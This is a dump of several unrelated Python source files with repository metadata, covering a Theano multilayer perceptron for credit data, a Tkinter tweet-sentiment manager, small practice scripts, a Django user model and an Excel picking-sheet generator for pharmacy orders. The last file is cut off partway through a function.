7a3fcd2835b9f9190930f94600a4aafaaaa3423b | 128e2652e2f0a4b4be57894bffab461c90170657 | /tej_python/basics/files/seek.py | 656f78a1ef2076688bbeb29b34170fdcee8bf41b | [] | no_license | tejadeep/Python_files | ec2695ec844e723d0784a67bd13c9a178c0aa601 | 43fde84dd62543e5ed9896177949cca877fdb858 | refs/heads/master | 2020-06-11T04:35:55.850108 | 2019-08-08T07:23:23 | 2019-08-08T07:23:23 | 193,851,082 | 0 | 0 | null | 2019-06-26T07:19:34 | 2019-06-26T07:19:34 | null | UTF-8 | Python | false | false | 52 | py | f=open("text","r")
f.seek(5,1)
a=f.read()
print (a)
| [
"you@example.com"
] | you@example.com |
3d0360c9581dcb36b488f9b5f81209c664b1dda8 | 42644e989c58ba6eb217dfbf1368ed25e403e3c5 | /creditmlp.py | 121a511b119da25e5df7af25f218f5cdfc092a32 | [] | no_license | brian1760/Project | d96977fa3176767f163680d0737daea2c754fc5b | 0c0b45977f8838131505bda4795fbc3b4817cfe2 | refs/heads/master | 2021-01-17T20:57:20.166516 | 2016-07-19T15:10:57 | 2016-07-19T15:10:57 | 63,683,587 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,546 | py | """
This tutorial introduces the multilayer perceptron using Theano.
A multilayer perceptron is a logistic regressor where
instead of feeding the input to the logistic regression you insert a
intermediate layer, called the hidden layer, that has a nonlinear
activation function (usually tanh or sigmoid) . One can use many such
hidden layers making the architecture deep. The tutorial will also tackle
the problem of MNIST digit classification.
.. math::
f(x) = G( b^{(2)} + W^{(2)}( s( b^{(1)} + W^{(1)} x))),
References:
- textbooks: "Pattern Recognition and Machine Learning" -
Christopher M. Bishop, section 5
"""
__docformat__ = 'restructedtext en'
import os
import sys
import timeit
import csv
import numpy
from sklearn.metrics import confusion_matrix
import theano
import theano.tensor as T
import pandas as pd
import cPickle
#import pylab as pl
from credit_sgd import LogisticRegression, load_data
from process_credit_data import *
# start-snippet-1
class HiddenLayer(object):
def __init__(self, rng, input, n_in, n_out, W=None, b=None,
activation=T.tanh):
"""
Typical hidden layer of a MLP: units are fully-connected and have
sigmoidal activation function. Weight matrix W is of shape (n_in,n_out)
and the bias vector b is of shape (n_out,).
NOTE : The nonlinearity used here is tanh
Hidden unit activation is given by: tanh(dot(input,W) + b)
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.dmatrix
:param input: a symbolic tensor of shape (n_examples, n_in)
:type n_in: int
:param n_in: dimensionality of input
:type n_out: int
:param n_out: number of hidden units
:type activation: theano.Op or function
:param activation: Non linearity to be applied in the hidden
layer
"""
self.input = input
# end-snippet-1
# `W` is initialized with `W_values` which is uniformely sampled
# from sqrt(-6./(n_in+n_hidden)) and sqrt(6./(n_in+n_hidden))
# for tanh activation function
# the output of uniform if converted using asarray to dtype
# theano.config.floatX so that the code is runable on GPU
# Note : optimal initialization of weights is dependent on the
# activation function used (among other things).
# For example, results presented in [Xavier10] suggest that you
# should use 4 times larger initial weights for sigmoid
# compared to tanh
# We have no info for other function, so we use the same as
# tanh.
if W is None:
W_values = numpy.asarray(
rng.uniform(
low=-numpy.sqrt(6. / (n_in + n_out)),
high=numpy.sqrt(6. / (n_in + n_out)),
size=(n_in, n_out)
),
dtype=theano.config.floatX
)
if activation == theano.tensor.nnet.sigmoid:
W_values *= 4
W = theano.shared(value=W_values, name='W', borrow=True)
if b is None:
b_values = numpy.zeros((n_out,), dtype=theano.config.floatX)
b = theano.shared(value=b_values, name='b', borrow=True)
self.W = W
self.b = b
lin_output = T.dot(input, self.W) + self.b
self.output = (
lin_output if activation is None
else activation(lin_output)
)
# parameters of the model
self.params = [self.W, self.b]
# start-snippet-2
class MLP(object):
"""Multi-Layer Perceptron Class
A multilayer perceptron is a feedforward artificial neural network model
that has one layer or more of hidden units and nonlinear activations.
Intermediate layers usually have as activation function tanh or the
sigmoid function (defined here by a ``HiddenLayer`` class) while the
top layer is a softmax layer (defined here by a ``LogisticRegression``
class).
"""
def __init__(self, rng, input, n_in, n_hidden, n_out):
"""Initialize the parameters for the multilayer perceptron
:type rng: numpy.random.RandomState
:param rng: a random number generator used to initialize weights
:type input: theano.tensor.TensorType
:param input: symbolic variable that describes the input of the
architecture (one minibatch)
:type n_in: int
:param n_in: number of input units, the dimension of the space in
which the datapoints lie
:type n_hidden: int
:param n_hidden: number of hidden units
:type n_out: int
:param n_out: number of output units, the dimension of the space in
which the labels lie
"""
# Since we are dealing with a one hidden layer MLP, this will translate
# into a HiddenLayer with a tanh activation function connected to the
# LogisticRegression layer; the activation function can be replaced by
# sigmoid or any other nonlinear function
self.hiddenLayer = HiddenLayer(
rng=rng,
input=input,
n_in=n_in,
n_out=n_hidden,
activation=T.tanh
)
# The logistic regression layer gets as input the hidden units
# of the hidden layer
self.logRegressionLayer = LogisticRegression(
input=self.hiddenLayer.output,
n_in=n_hidden,
n_out=n_out
)
# end-snippet-2 start-snippet-3
# L1 norm ; one regularization option is to enforce L1 norm to
# be small
self.L1 = (
abs(self.hiddenLayer.W).sum()
+ abs(self.logRegressionLayer.W).sum()
)
# square of L2 norm ; one regularization option is to enforce
# square of L2 norm to be small
self.L2_sqr = (
(self.hiddenLayer.W ** 2).sum()
+ (self.logRegressionLayer.W ** 2).sum()
)
# negative log likelihood of the MLP is given by the negative
# log likelihood of the output of the model, computed in the
# logistic regression layer
self.negative_log_likelihood = (
self.logRegressionLayer.negative_log_likelihood
)
# same holds for the function computing the number of errors
self.errors = self.logRegressionLayer.errors
# the parameters of the model are the parameters of the two layer it is
# made out of
self.params = self.hiddenLayer.params + self.logRegressionLayer.params
# end-snippet-3
# keep track of model input
self.input = input
def __getstate__(self):
return (self.logRegressionLayer, self.hiddenLayer, self.input)
def __setstate__(self, state):
logRegressionLayer, hiddenLayer, input = state
self.logRegressionLayer = logRegressionLayer
self.hiddenLayer = hiddenLayer
self.input = input
def test_mlp(learning_rate=0.01, L1_reg=0.00, L2_reg=0.0001, n_epochs=10000, #batch size from 20 to 100
dataset='../data/mnist.pkl.gz', batch_size=80, n_hidden=90): # n_hidden altered from 20 to 90
"""
Demonstrate stochastic gradient descent optimization for a multilayer
perceptron
This is demonstrated on MNIST.
:type learning_rate: float
:param learning_rate: learning rate used (factor for the stochastic
gradient
:type L1_reg: float
:param L1_reg: L1-norm's weight when added to the cost (see
regularization)
:type L2_reg: float
:param L2_reg: L2-norm's weight when added to the cost (see
regularization)
:type n_epochs: int
:param n_epochs: maximal number of epochs to run the optimizer
:type dataset: string
:param dataset: the path of the MNIST dataset file from
http://www.iro.umontreal.ca/~lisa/deep/data/mnist/mnist.pkl.gz
"""
datasets = load_data(dataset)
train_set_x, train_set_y = datasets[0]
valid_set_x, valid_set_y = datasets[1]
test_set_x, test_set_y = datasets[2]
# compute number of minibatches for training, validation and testing
n_train_batches = train_set_x.get_value(borrow=True).shape[0] / batch_size
n_valid_batches = valid_set_x.get_value(borrow=True).shape[0] / batch_size
n_test_batches = test_set_x.get_value(borrow=True).shape[0] / batch_size
######################
# BUILD ACTUAL MODEL #
######################
print '... building the model'
# allocate symbolic variables for the data
index = T.lscalar() # index to a [mini]batch
x = T.matrix('x') # the data is presented as rasterized images
y = T.ivector('y') # the labels are presented as 1D vector of
# [int] labels
rng = numpy.random.RandomState(1234)
# construct the MLP class
classifier = MLP(
rng=rng,
input=x,
n_in=23, # altered from 4 to 23
n_hidden=n_hidden,
n_out=2 # altered from 3 to 2
)
# start-snippet-4
# the cost we minimize during training is the negative log likelihood of
# the model plus the regularization terms (L1 and L2); cost is expressed
# here symbolically
cost = (
classifier.negative_log_likelihood(y)
+ L1_reg * classifier.L1
+ L2_reg * classifier.L2_sqr
)
# end-snippet-4
# compiling a Theano function that computes the mistakes that are made
# by the model on a minibatch
test_model = theano.function(
inputs=[index],
outputs=classifier.errors(y),
givens={
x: test_set_x[index * batch_size:(index + 1) * batch_size],
y: test_set_y[index * batch_size:(index + 1) * batch_size]
}
)
validate_model = theano.function(
inputs=[index],
outputs=classifier.errors(y),
givens={
x: valid_set_x[index * batch_size:(index + 1) * batch_size],
y: valid_set_y[index * batch_size:(index + 1) * batch_size]
}
)
# start-snippet-5
# compute the gradient of cost with respect to theta (sotred in params)
# the resulting gradients will be stored in a list gparams
gparams = [T.grad(cost, param) for param in classifier.params]
# specify how to update the parameters of the model as a list of
# (variable, update expression) pairs
# given two lists of the same length, A = [a1, a2, a3, a4] and
# B = [b1, b2, b3, b4], zip generates a list C of same size, where each
# element is a pair formed from the two lists :
# C = [(a1, b1), (a2, b2), (a3, b3), (a4, b4)]
updates = [
(param, param - learning_rate * gparam)
for param, gparam in zip(classifier.params, gparams)
]
# compiling a Theano function `train_model` that returns the cost, but
# in the same time updates the parameter of the model based on the rules
# defined in `updates`
train_model = theano.function(
inputs=[index],
outputs=cost,
updates=updates,
givens={
x: train_set_x[index * batch_size: (index + 1) * batch_size],
y: train_set_y[index * batch_size: (index + 1) * batch_size]
}
)
# end-snippet-5
###############
# TRAIN MODEL #
###############
print '... training'
# early-stopping parameters
patience = 10000 # look as this many examples regardless
patience_increase = 2 # wait this much longer when a new best is
# found
improvement_threshold = 0.995 # a relative improvement of this much is
# considered significant
validation_frequency = min(n_train_batches, patience / 2)
# go through this many
# minibatche before checking the network
# on the validation set; in this case we
# check every epoch
best_validation_loss = numpy.inf
best_iter = 0
test_score = 0.
start_time = timeit.default_timer()
epoch = 0
done_looping = False
while (epoch < n_epochs) and (not done_looping):
epoch = epoch + 1
for minibatch_index in xrange(n_train_batches):
minibatch_avg_cost = train_model(minibatch_index)
# iteration number
iter = (epoch - 1) * n_train_batches + minibatch_index
if (iter + 1) % validation_frequency == 0:
# compute zero-one loss on validation set
validation_losses = [validate_model(i) for i
in xrange(n_valid_batches)]
this_validation_loss = numpy.mean(validation_losses)
print(
'epoch %i, minibatch %i/%i, validation error %f %%' %
(
epoch,
minibatch_index + 1,
n_train_batches,
this_validation_loss * 100.
)
)
# if we got the best validation score until now
if this_validation_loss < best_validation_loss:
#improve patience if loss improvement is good enough
if (
this_validation_loss < best_validation_loss *
improvement_threshold
):
patience = max(patience, iter * patience_increase)
best_validation_loss = this_validation_loss
best_iter = iter
# test it on the test set
test_losses = [test_model(i) for i
in xrange(n_test_batches)]
test_score = numpy.mean(test_losses)
print((' epoch %i, minibatch %i/%i, test error of '
'best model %f %%') %
(epoch, minibatch_index + 1, n_train_batches,
test_score * 100.))
if patience <= iter:
done_looping = True
break
end_time = timeit.default_timer()
print(('Optimization complete. Best validation score of %f %% '
'obtained at iteration %i, with test performance %f %%') %
(best_validation_loss * 100., best_iter + 1, test_score * 100.))
print >> sys.stderr, ('The code for file ' +
os.path.split(__file__)[1] +
' ran for %.2fm' % ((end_time - start_time) / 60.))
# save the model
with open('mlp_model.pkl', 'w') as f:
cPickle.dump(classifier, f)
# Function to calculate the success rate of the classifier predictions
correct =0
xs=test_set_x.eval()
ys=test_set_y.eval()
test_function=theano.function(inputs=[x],outputs=classifier.logRegressionLayer.y_pred)
for idx, vector in enumerate(xs):
i=numpy.ndarray((1,23),buffer=vector)
prediction=test_function(i)[0]
print('prediction',prediction)
if prediction==ys[idx]:
print('actual',ys[idx])
correct=correct+1
successRate=str(float(correct)/len(ys))
print('Success Rate :',successRate)
#Function to return the actual classification, and the classifier from the model
y_true=[]
y_pred=[]
difference=[]
xs = test_set_x.eval()
ys = test_set_y.eval()
test_functionConfuse=theano.function(inputs=[x],outputs=classifier.logRegressionLayer.y_pred)
for idx, vector in enumerate(xs):
i = numpy.ndarray((1,23), buffer=vector)
prediction = test_functionConfuse(i)[0]
print('prediction', prediction)
print('true',ys[idx])
# print('difference',(ys[idx]-prediction))
y_pred.append(prediction)
y_true.append(ys[idx])
# difference.append((ys[idx]-prediction))
cm=confusion_matrix(y_true,y_pred)
print(cm)
# successRate=str(float(correct)/len(ys))
# print('SuccessRate is: ',successRate)
print('y_pred: ',len(y_pred))
print('y_true: ',len(y_true))
print('difference',difference)
y_true=[]
y_pred=[]
missClassified=[]
correct = 0
xs = test_set_x.eval()
ys = test_set_y.eval()
test_functionMissCatigorised=theano.function(inputs=[x],outputs=classifier.logRegressionLayer.y_pred)
for idx, vector in enumerate(xs):
i = numpy.ndarray((1,23), buffer=vector)
prediction = test_functionMissCatigorised(i)[0]
if prediction != ys[idx]:
missClassified.append(prediction)
missClassified.append(ys[idx])
# print('mass classified :',missClassified)
# print('prediction11', prediction)
y_pred.append(prediction)
y_true.append(ys[idx])
successRate=str(float(correct)/len(ys))
cm=confusion_matrix(y_true,y_pred)
print(cm)
# df_confusion = pd.crosstab(y_true, y_pred)
# print(df_confusion)
# df_confusion = pd.crosstab(y_true, y_pred, rownames=['Actual'], colnames=['Predicted'], margins=True)
with open('creditFile.csv', 'w') as f:
writer = csv.writer(f, delimiter='\t')
writer.writerows(zip(y_pred,y_true))
# print('miss classified :',missClassified)
if __name__ == '__main__':
test_mlp()
| [
"brian1760@hotmail.co.uk"
] | brian1760@hotmail.co.uk |
0a73a141621ba3d032ac2f6b9c9fbec5f12eabb2 | d44e7d85d4d8c601965c3dfdd09937b76b292d6f | /practice_06_03.py | f8ad37f3be0898e5a5170b244a3c59ad40a1ec80 | [] | no_license | Jean-1220/study_python | 84a0a34c0f7a16f13288871b5c1f4ec26b013d1a | 3bddf1d28875ddf69769b82dd7fc07be46bbb551 | refs/heads/master | 2023-04-28T15:29:03.732120 | 2021-05-25T08:38:02 | 2021-05-25T08:38:02 | 367,266,186 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 499 | py | #함수_기본값
# def profile(name, age, main_lang) :
# print("이름 : {0}\t나이 : {1}\t주 사용 언어 : {2}" \
# .format(name, age, main_lang))
# profile("유재석", 20, "파이썬")
# profile("김태호", 25, "자바")
#같은 학교 같은 학년 같은 반 같은 수업
def profile(name, age=17, main_lang="파이썬") :
print("이름 : {0}\t나이 : {1}\t주 사용 언어 : {2}" \
.format(name, age, main_lang))
profile("유재석")
profile("김태호") | [
"123sijin@sookmyung.ac.kr"
] | 123sijin@sookmyung.ac.kr |
cdfae9f0ea4d063ab1de30e02515f2d263d6592c | 74461144ed60c9211575b99c483f9f6b970ecf54 | /tesilm_sa/main.py | 1841b62d8a88c63d988f1f9952b8f1056cd69f36 | [] | no_license | mmilidoni/tesilm | 8bbd8a84139c79a42b8cc392477d2df441edbaf7 | 70d92d8fa87be446a17c6a257bbb41e9caedadd4 | refs/heads/master | 2021-01-22T04:09:33.262358 | 2017-05-24T22:31:10 | 2017-05-24T22:31:10 | 81,505,250 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,659 | py | from ScrolledText import ScrolledText
from Tkinter import *
from politician import Politician
from etl import Etl
from tweetprocessor import TweetProcessor
class App:
def __init__(self, master):
self.tweetProcessorObject = TweetProcessor()
self.politicianObject = Politician()
# tweet processor frame
rowTweetProcessor = 0
tweetProcessorFrame = LabelFrame(master, text="Tweet Processor")
tweetProcessorFrame.grid(row=rowTweetProcessor, column=0)
## add tweet
lblAddTweet = Label(tweetProcessorFrame, text="Add Tweet (json): ",
anchor='w', justify='left')
self.txtAddTweet = Text(tweetProcessorFrame, height=10)
lblAddTweet.grid(row=0, column=0)
self.txtAddTweet.grid(row=1, column=0)
btnAddTweet = Button(tweetProcessorFrame, text="Add", command=self.addTweet)
btnAddTweet.grid(row=2, column=0)
btnExportGephi = Button(tweetProcessorFrame, text="Export Gephi file (*.gexf)", command=self.exportGephi)
btnExportGephi.grid(row=3, column=0)
# politician frame
rowPolitician = 1
politicianFrame = LabelFrame(master, text="Politician")
politicianFrame.grid(row=rowPolitician, column=0)
## add politician
lblAddPolitican = Label(politicianFrame, text="Add Politician (dbpedia URI): ",
anchor='w', justify='left')
self.entryAddPolitician = Entry(politicianFrame, width=40)
lblAddPolitican.grid(row=0, column=0)
self.entryAddPolitician.grid(row=0, column=1)
btnAddPolitician = Button(politicianFrame, text="Add", command=self.addPolitician)
btnAddPolitician.grid(row=0, column=2)
## list politicians
btnListPoliticians = Button(politicianFrame, text="List", command=self.listPoliticians)
btnListPoliticians.grid(row=1, column=0, columnspan=3)
# output frame
rowOutputFrame = 2
outputFrame = LabelFrame(master, text="Output")
outputFrame.grid(row=rowOutputFrame, column=0, sticky=W + E + N + S)
self.txtOutputFrame = ScrolledText(outputFrame, width=160)
self.txtOutputFrame.pack(fill=BOTH, expand=1)
self.txtOutputFrame.config(wrap=NONE)
def addTweet(self):
try:
output = self.tweetProcessorObject.process(self.txtAddTweet.get(1.0, END))
if len(output) == 0:
out = "Match politician <-> tweet not found"
else:
out = ""
out += str(len(output)) + " sentiments added\n"
out += "-------- DETAILS ------------\n"
for [politician, sentiment] in output:
out += "Politician: " + politician["familyName"] + " " + politician["givenName"] + "\n"
out += sentiment.upper() + " sentiment\n"
out += "-------------------------------\n"
self.writeOutput(out)
except Exception as eDetail:
self.writeOutput(eDetail)
raise
def addPolitician(self):
try:
if self.politicianObject.add(self.entryAddPolitician.get()):
self.writeOutput("Politician added")
else:
self.writeOutput("Internal error")
except Exception as eDetail:
self.writeOutput(eDetail)
raise
def exportGephi(self):
e = Etl()
from tkFileDialog import asksaveasfilename
import tkMessageBox
filename = asksaveasfilename()
if e.exportGephi(filename):
tkMessageBox.showinfo("Info", "File salvato con successo.")
def listPoliticians(self):
out = ""
for politician in self.politicianObject.getRawList():
out += politician
self.writeOutput(out)
def writeOutput(self, text):
#self.txtOutputFrame.config(state=NORMAL)
self.txtOutputFrame.delete(1.0, END)
self.txtOutputFrame.insert(END, text)
#self.txtOutputFrame.config(state=DISABLED)
def center(toplevel):
toplevel.update_idletasks()
w = toplevel.winfo_screenwidth()
h = toplevel.winfo_screenheight()
size = tuple(int(_) for _ in toplevel.geometry().split('+')[0].split('x'))
x = w / 2 - size[0] / 2
y = h / 2 - size[1] / 2
toplevel.geometry("%dx%d+%d+%d" % (size + (x, y)))
root = Tk()
root.title("Twitter Sentiment Analysis Manager")
#root.minsize(800, 400)
App(root)
center(root)
root.mainloop()
#if __name__ == "__main__":
# pt = TweetProcessor()
# pt.process('{"created_at":"Sat Aug 21 06:30:00 +0000 2015","id":627365646456623104,"id_str":"627365646456623104","text":"Bill Clinton is terrible!","truncated":false,"in_reply_to_status_id":null,"in_reply_to_status_id_str":null,"in_reply_to_user_id":null,"in_reply_to_user_id_str":null,"in_reply_to_screen_name":null,"user":{"id":2394398282,"id_str":"2394398282","name":"\u5c11\u5e74\u53f8\u4ee4\u5b98@\u30ea\u30af","screen_name":"lockon85193738","location":"","url":null,"description":"\u4e16\u754c\u6700\u5f31\u306e\u7537","protected":false,"verified":false,"followers_count":158,"friends_count":204,"listed_count":12,"favourites_count":2243,"statuses_count":13637,"created_at":"Mon Mar 17 13:28:08 +0000 2014","utc_offset":null,"time_zone":null,"geo_enabled":false,"lang":"en","contributors_enabled":false,"is_translator":false,"profile_background_color":"C0DEED","profile_background_image_url":"http:\/\/abs.twimg.com\/images\/themes\/theme1\/bg.png","profile_background_image_url_https":"https:\/\/abs.twimg.com\/images\/themes\/theme1\/bg.png","profile_background_tile":false,"profile_link_color":"0084B4","profile_sidebar_border_color":"C0DEED","profile_sidebar_fill_color":"DDEEF6","profile_text_color":"333333","profile_use_background_image":true,"profile_image_url":"http:\/\/pbs.twimg.com\/profile_images\/626315196970110976\/GDt0wiOG_normal.jpg","profile_image_url_https":"https:\/\/pbs.twimg.com\/profile_images\/626315196970110976\/GDt0wiOG_normal.jpg","profile_banner_url":"https:\/\/pbs.twimg.com\/profile_banners\/2394398282\/1438160154","default_profile":true,"default_profile_image":false,"following":null,"follow_request_sent":null,"notifications":null},"geo":null,"coordinates":null,"place":null,"contributors":null,"retweet_count":0,"favorite_count":0,"entities":{"hashtags":[],"trends":[],"urls":[],"user_mentions":[],"symbols":[]},"favorited":false,"retweeted":false,"possibly_sensitive":false,"filter_level":"low","lang":"en","timestamp_ms":"1438410600662"}')
| [
"michelemilidoni@gmail.com"
] | michelemilidoni@gmail.com |
7c195dbd7c5521e6969608c34feec58e6f8d2e51 | e0725eb2a9f3582afc3421fa43a89ac1eba404ea | /user/models.py | ef26a1a73fabb1b531d9140bab7f1fb317ee1ca8 | [] | no_license | Dannykl/crud_operation_in_django | 31235965b5bbd9ffaa882e372ea8a408ce3c6da1 | d68e70587b22b593295782d3701e38b153d1dd4f | refs/heads/master | 2021-08-30T18:40:41.061334 | 2021-08-17T11:48:55 | 2021-08-17T11:48:55 | 173,336,608 | 0 | 0 | null | 2021-08-17T11:49:35 | 2019-03-01T16:46:16 | Python | UTF-8 | Python | false | false | 146 | py | # Create your models here.
from django.db import models
from django.contrib.auth.models import AbstractUser
class User(AbstractUser):
pass
| [
"Danielniguse8@gmail.com"
] | Danielniguse8@gmail.com |
3d5421e76fe33f582359aeafedc29fae2292199a | 843f44309d466aff357d041023c45028d1e9c3c2 | /app/docs.py | 4cd0271f06ef4931a2e8469a57e3b95e66a9b51f | [] | no_license | raphaelcjamarante/app-pharmashopi | 375faf014834e72e9a6d2c84802a34c04b9593bf | 4df103aa3875c2969ef5d1ea42f3c9bd4760ce63 | refs/heads/master | 2020-06-30T01:46:18.407274 | 2019-08-26T12:51:35 | 2019-08-26T12:51:35 | 200,683,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 12,705 | py | # -*- coding: utf-8 -*-
from barcode.writer import ImageWriter
import barcode
import datetime
import os
import unicodedata
import xlsxwriter
import app.log
import app.utilities
logger = app.log.setup_logger(__name__)
#------------------------------------------------------------
def cell_format(workbook, mode, livraison):
    """ Build the xlsxwriter cell formats used by the generated sheets.

    Parameters
    ----------
    workbook : xlsxwriter.Workbook
        Workbook the formats are registered on.
    mode : str
        Either "picking" or "bonprep"; selects which extra formats are built.
    livraison : str
        Delivery type; 'Mondial Relay' gets a gray background in bonprep mode.

    Return
    ------
    cells : dict
        Mapping from format key to xlsxwriter format object.
    """
    def make(bold=False, underline=False, strike=False, font_size=None,
             halign='center', vcenter=True, bg_color=None):
        # Every format wraps text and uses border style 7.
        fmt = workbook.add_format({'text_wrap': True})
        if bold:
            fmt.set_bold()
        if underline:
            fmt.set_underline()
        fmt.set_border(7)
        if font_size is not None:
            fmt.set_font_size(font_size)
        if halign is not None:
            fmt.set_align(halign)
        if vcenter:
            fmt.set_align('vcenter')
        if strike:
            fmt.set_font_strikeout()
        if bg_color is not None:
            fmt.set_bg_color(bg_color)
        return fmt

    cells = {}
    # Formats shared by both modes.
    cells["2"] = make()
    cells["3"] = make(bold=True)
    cells["6"] = make(bold=True, font_size=17)
    cells["7"] = make(bold=True, font_size=6)

    if mode == "picking":
        # "bis" variants carry a strikethrough.
        cells["2bis"] = make(strike=True)
        cells["3bis"] = make(bold=True, strike=True)
        cells["4"] = make(bold=True, underline=True)
        cells["6bis"] = make(bold=True, font_size=17, strike=True)

    if mode == "bonprep":
        bg = 'gray' if livraison == 'Mondial Relay' else 'white'
        cells["mondial"] = make(bg_color=bg)
        cells["11"] = make(bold=True, halign=None, vcenter=False)
        cells["33"] = make(bold=True)
        cells["4"] = make(font_size=10, halign=None)
        cells["total"] = make(halign='right')
        cells["9"] = make(bold=True, font_size=13)

    return cells
#------------------------------------------------------------
def picking_doc(batch, livraison):
    """ Write the picking sheet (docs/Picking.xlsx) for a batch.

    Parameters
    ----------
    batch : Batch
        Object holding the batch data (products, quantities, robot stocks).
    livraison : str
        Delivery mode, printed in the sheet header.
    """
    # Probe: open-and-close the target file first so we fail fast (with a
    # clear message) if it is currently locked, e.g. open in Excel.
    try:
        workbook = xlsxwriter.Workbook(app.utilities.get_path("docs/Picking.xlsx"))
        workbook.close()
    except Exception:
        logger.error("Fichier Picking.xlsx est ouvert. Fermez-le.")
        logger.new_formatter("newline")
        raise
    print("Écriture Picking.xlsx...")
    print("******************************************\n")
    workbook = xlsxwriter.Workbook(app.utilities.get_path("docs/Picking.xlsx"))
    cf = cell_format(workbook, "picking", livraison)
    worksheet = workbook.add_worksheet()
    worksheet.set_margins(0.2, 0.2, 0.2, 0.2)
    # Fixed column widths for the 8 columns of the picking table.
    worksheet.set_column(0, 0, 3)
    worksheet.set_column(1, 1, 4)
    worksheet.set_column(2, 2, 7)
    worksheet.set_column(3, 3, 14)
    worksheet.set_column(4, 4, 12)
    worksheet.set_column(5, 5, 37)
    worksheet.set_column(6, 6, 7)
    worksheet.set_column(7, 7, 7)
    path = app.utilities.get_path("docs/images/pharmashopi.png")
    worksheet.insert_image('A3', path, {'x_scale': 0.5, 'y_scale': 0.5})
    now = datetime.datetime.now()
    # Header block: delivery type, date/time, and the batch summary.
    worksheet.merge_range('B6:D7', f"Type livraison : {livraison}", cf["3"])
    worksheet.write(2, 5, now.strftime("%A %d %b %Y"), cf["4"])
    worksheet.write(3, 5, f"Heure : {now.strftime('%H:%M:%S')}", cf["4"])
    worksheet.write(4, 5, "Bon de preparations : ", cf["4"])
    worksheet.write(5, 5, batch.get_range(), cf["3"])
    worksheet.write(6, 5, f"{batch.get_total_quantity()} produits", cf["3"])
    # Column headers (row index 8 is row 9 in the sheet).
    worksheet.write(8, 1, 'Qte', cf["3"])
    worksheet.write(8, 2, 'Stock', cf["3"])
    worksheet.write(8, 3, 'Code barres', cf["3"])
    worksheet.write(8, 4, 'Marque', cf["3"])
    worksheet.write(8, 5, 'Article', cf["3"])
    worksheet.write(8, 6, 'Options', cf["3"])
    worksheet.write(8, 7, 'Prix(ht)', cf["3"])
    row = 10
    col = 0
    for key in batch.prods_info:
        prod = batch.prods_info[key]['product']
        qte = batch.prods_info[key]['total_qte']
        robot_stock = batch.prods_info[key]['robot_stock']
        ref = key  # dict key is the product barcode/reference
        if int(robot_stock) < qte:
            # Robot stock insufficient: plain formats — the line must be
            # picked (at least partially) by hand.
            worksheet.write(row, col, robot_stock, cf["2"])
            worksheet.write(row, col + 1, qte, cf["6"])
            worksheet.write(row, col + 3, ref, cf["3"])
            worksheet.write(row, col + 5, prod.name, cf["2"])
        else:
            # Robot can serve the full quantity: strikethrough formats.
            worksheet.write(row, col, robot_stock, cf["2bis"])
            worksheet.write(row, col + 1, qte, cf["6bis"])
            worksheet.write(row, col + 3, ref, cf["3bis"])
            worksheet.write(row, col + 5, prod.name, cf["2bis"])
        worksheet.write_string(row, col + 2, prod.get_stocks(), cf["2"])
        worksheet.write(row, col + 4, prod.brand_name, cf["2"])
        worksheet.write(row, col + 6, prod.get_options(), cf["7"])
        worksheet.write(row, col + 7, round(prod.final_price, 2), cf["2"])
        row += 1
    workbook.close()
    logger.info("Picking.xlsx écrit")
    logger.new_formatter("newline")
#------------------------------------------------------------
def bonprep_doc(cmds, livraison):
    """ Write the preparation slips (docs/BonCommande.xlsx), one sheet per order.

    Parameters
    ----------
    cmds :
        Dict of Commande objects, keyed by order id.
    livraison : str
        Delivery mode (passed through to cell_format for styling).
    """
    # Probe: open-and-close the target file so we fail fast if it is locked.
    try:
        workbook = xlsxwriter.Workbook(app.utilities.get_path("docs/BonCommande.xlsx"))
        workbook.close()
    except Exception:
        logger.error("Fichier BonCommande.xlsx est ouvert. Fermez-le.")
        logger.new_formatter("newline")
        raise
    print("Écriture BonCommande.xlsx...")
    print("******************************************\n")
    workbook = xlsxwriter.Workbook(app.utilities.get_path("docs/BonCommande.xlsx"))
    cf = cell_format(workbook, "bonprep", livraison)
    ean_index = 0  # counter used to give each generated barcode image a unique filename
    list_cmds = list(cmds.values())
    list_cmds = sorted(list_cmds, key=lambda k: k.id)
    for cmd in list_cmds:
        date = cmd.get_date_created(mode='barcode')
        strdate = cmd.get_date_created(mode='string')
        # EAN-13 barcode built from the order id + creation date.
        EAN = barcode.get_barcode_class('ean13')
        ean = EAN(str(cmd.id) + date, writer=ImageWriter())
        path = app.utilities.get_path("docs/barcodes/ean13" + str(ean_index))
        filename = ean.save(path)
        worksheet = workbook.add_worksheet()
        worksheet.set_margins(0.2, 0.2, 0.2, 0.2)
        # Fixed column widths for the 9-column slip layout.
        worksheet.set_column(0, 0, 4)
        worksheet.set_column(1, 1, 5)
        worksheet.set_column(2, 2, 13.5)
        worksheet.set_column(3, 3, 11.5)
        worksheet.set_column(4, 4, 30)
        worksheet.set_column(5, 5, 6.5)
        worksheet.set_column(6, 6, 7)
        worksheet.set_column(7, 7, 6)
        worksheet.set_column(8, 8, 6)
        path = app.utilities.get_path("docs/images/pharmashopi.png")
        worksheet.insert_image('B2', path, {'x_scale': 0.45, 'y_scale': 0.45})
        path = app.utilities.get_path("docs/barcodes/ean13" + str(ean_index) + ".png")
        worksheet.insert_image('G2', path, {'x_scale': 0.25, 'y_scale': 0.25})
        ean_index += 1
        # Order header (left) and delivery address (right).
        worksheet.merge_range('A7:C8', 'Commande : ' + cmd.id, cf["9"])
        worksheet.merge_range('A9:C9', 'Numero client : ' + cmd.customer.id, cf["3"])
        worksheet.merge_range('A10:C10', 'Date : ' + strdate, cf["3"])
        worksheet.merge_range('A11:C12', cmd.payment.method_name, cf["3"])
        worksheet.merge_range('A13:C14', str(cmd.get_total_quantity()) + " articles", cf["9"])
        worksheet.merge_range('F7:I7', "Adresse de livraison: ", cf["3"])
        worksheet.merge_range('F8:I14', cmd.delivery_address.get_complete_address(), cf["4"])
        # One full-width banner row per health-information item.
        row = 16
        info_sante = cmd.get_sante()
        for item in info_sante:
            worksheet.merge_range(f"A{str(row)}:I{str(row)}", item, cf["11"])
            row += 1
        row += 1
        # Product table headers. NOTE: write() uses 0-based indices while the
        # A1-style merge_range strings above/below are 1-based.
        worksheet.write(row, 0, 'Qte', cf["33"])
        worksheet.write(row, 1, 'Notes', cf["33"])
        worksheet.write(row, 2, 'Code barres', cf["33"])
        worksheet.write(row, 3, 'Marque', cf["33"])
